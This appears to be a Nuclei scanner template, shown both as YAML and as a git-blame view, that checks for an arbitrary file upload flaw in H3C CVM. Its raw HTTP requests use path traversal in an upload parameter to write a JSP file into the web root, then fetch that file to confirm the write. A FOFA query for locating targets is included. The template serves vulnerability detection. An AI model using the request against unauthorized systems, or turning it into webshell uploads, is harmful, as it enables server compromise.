nuclei-templates/http/vulnerabilities/other/h3c-cvm-arbitrary-file-uplo...

id: h3c-cvm-arbitrary-file-upload

info:
  name: H3C CVM - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml
  metadata:
    max-request: 2
    verified: true
    fofa-query: server="H3C-CVM"
  tags: h3c,lfi,intrusive

variables:
  payload_1: "{{randstr_1}}"
  payload_2: "{{randstr_2}}"

http:
  - raw:
      - |
        POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{payload_1}}.jsp&name=222" HTTP/1.1
        Host: {{Hostname}}
        Content-range: bytes 0-10/20
        Accept-Encoding: gzip, deflate

        {{payload_2}}

      - |
        GET /cas/js/lib/buttons/{{payload_1}}.jsp HTTP/1.1
        Host: {{Hostname}}

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "{{payload_2}}"

      - type: word
        part: header
        words:
          - "Content-Type: text/html"

      - type: status
        status:
          - 200
H3C CVM - Arbitrary File Upload 2023-08-21 03:00:47 +00:00			`id: h3c-cvm-arbitrary-file-upload`

			`info:`
			`name: H3C CVM - Arbitrary File Upload`
			`author: SleepingBag945`
			`severity: critical`
Update h3c-cvm-arbitrary-file-upload.yaml 2023-08-21 03:13:24 +00:00			`description: \|`
			`An H3C CVM vulnerability allows for arbitrary file uploads. This enables attackers to upload any files they choose, acquire webshells, manipulate server permissions, and access sensitive information.`
H3C CVM - Arbitrary File Upload 2023-08-21 03:00:47 +00:00			`reference:`
Update h3c-cvm-arbitrary-file-upload.yaml 2023-08-21 03:13:24 +00:00			`- https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/h3c-cvm-fileupload.yaml`
H3C CVM - Arbitrary File Upload 2023-08-21 03:00:47 +00:00			`metadata:`
			`max-request: 2`
			`verified: true`
Update h3c-cvm-arbitrary-file-upload.yaml 2023-08-21 03:13:24 +00:00			`fofa-query: server="H3C-CVM"`
intrusive - tag 2023-08-21 06:03:11 +00:00			`tags: h3c,lfi,intrusive`
H3C CVM - Arbitrary File Upload 2023-08-21 03:00:47 +00:00
			`variables:`
lint - fix 2023-08-21 03:08:07 +00:00			`payload_1: "{{randstr_1}}"`
			`payload_2: "{{randstr_2}}"`
H3C CVM - Arbitrary File Upload 2023-08-21 03:00:47 +00:00
			`http:`
			`- raw:`
			`- \|`
Update h3c-cvm-arbitrary-file-upload.yaml 2023-08-21 03:13:24 +00:00			`POST /cas/fileUpload/upload?token=/../../../../../var/lib/tomcat8/webapps/cas/js/lib/buttons/{{payload_1}}.jsp&name=222" HTTP/1.1`
H3C CVM - Arbitrary File Upload 2023-08-21 03:00:47 +00:00			`Host: {{Hostname}}`
			`Content-range: bytes 0-10/20`
			`Accept-Encoding: gzip, deflate`

			`{{payload_2}}`

			`- \|`
			`GET /cas/js/lib/buttons/{{payload_1}}.jsp HTTP/1.1`
			`Host: {{Hostname}}`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`words:`
			`- "{{payload_2}}"`

			`- type: word`
			`part: header`
			`words:`
			`- "Content-Type: text/html"`

			`- type: status`
			`status:`
lint - fix 2023-08-21 03:08:07 +00:00			`- 200`